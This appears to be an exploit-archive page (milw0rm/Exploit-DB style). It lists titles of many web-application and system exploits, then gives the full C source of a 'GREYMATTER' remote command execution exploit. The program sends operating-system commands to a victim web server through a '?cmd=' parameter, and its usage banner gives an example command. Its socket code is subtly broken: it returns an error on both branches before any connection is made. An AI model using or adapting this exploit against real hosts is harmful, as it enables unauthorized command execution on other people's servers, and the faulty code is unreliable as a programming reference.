
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
99 lines
2.8 KiB
C
Executable file
99 lines
2.8 KiB
C
Executable file
#include <stdio.h>
|
|
#include <windows.h>
|
|
#include <winsock2.h>
|
|
#define RETCONNERR 4 // Connection error
|
|
#define RETSOCKERR 3 // Return for socket error
|
|
#define RETRESVERR 2 // Error code for cannot resolve host
|
|
#define RETOK 1 // Return OK
|
|
#pragma comment(lib,"wsock32")
|
|
#define portnum 80
|
|
int info(char *ls1);
|
|
int ConnectWithString(char *hostname,char *string);
|
|
int main(int argc,char **argv){
|
|
char buff[512]="";
|
|
char get[1024]="";
|
|
if(argc<3)
|
|
{
|
|
info(argv[0]);
|
|
return 0;
|
|
}
|
|
strcpy(buff,argv[2]);
|
|
strcat(buff,"?cmd=");
|
|
strcat(buff,argv[3]);
|
|
strcpy(get,"GET ");
|
|
strcat(get,buff);
|
|
strcat(get," HTTP/1.1");
|
|
printf("%s\n",get);
|
|
ConnectWithString(argv[1],get);
|
|
return 0;
|
|
}
|
|
int ConnectWithString(char *hostname,char *string)
|
|
{
|
|
// Socket handle
|
|
WSADATA wsda;
|
|
|
|
// Socket file descriptor
|
|
int sockfd;
|
|
|
|
// host entrie
|
|
struct hostent *h;
|
|
|
|
// Server struct
|
|
struct sockaddr_in server;
|
|
|
|
// Return value
|
|
int ret;
|
|
|
|
// Initialize socket
|
|
WSAStartup(0x0101, &wsda);
|
|
|
|
// Open a socket
|
|
// Create tcp socket
|
|
if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
|
|
return RETSOCKERR;
|
|
|
|
// Cannot create socket if anything fails
|
|
else
|
|
return RETSOCKERR;
|
|
|
|
// Resolve host
|
|
if((h=gethostbyname(hostname)) == NULL)
|
|
return RETRESVERR;
|
|
|
|
// Init server struct
|
|
server.sin_addr=*((struct in_addr*)h->h_addr);
|
|
server.sin_port=htons(portnum);
|
|
server.sin_family=AF_INET;
|
|
|
|
// Connect with server
|
|
if(connect(sockfd, (struct sockaddr*)&server, sizeof(struct sockaddr)) == -1)
|
|
return RETCONNERR;
|
|
|
|
// Send string
|
|
ret = send(sockfd, string, strlen(string), 0);
|
|
|
|
// Check for socket error
|
|
if(ret == SOCKET_ERROR)
|
|
return RETSOCKERR;
|
|
|
|
// Cleanup socket
|
|
WSACleanup();
|
|
|
|
closesocket(sockfd);
|
|
|
|
// Everything OK
|
|
|
|
return RETOK;
|
|
}
|
|
int info(char *ls1){
|
|
printf("******************************************************************\n");
|
|
printf("* GREYMATTER Exploit private version *\n");
|
|
printf("* Exploit By:No_Face_King Bug By:syst3m_f4ult *\n");
|
|
printf("* www.crouz.com Great iranian security team *\n");
|
|
printf("* Usage: %s VictimIP GREYMATTER Path command *\n",ls1);
|
|
printf("* e.g: %s 192.168.0.1 /00000008.php uname -a *\n",ls1);
|
|
printf("******************************************************************\n");
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2006-03-28]
|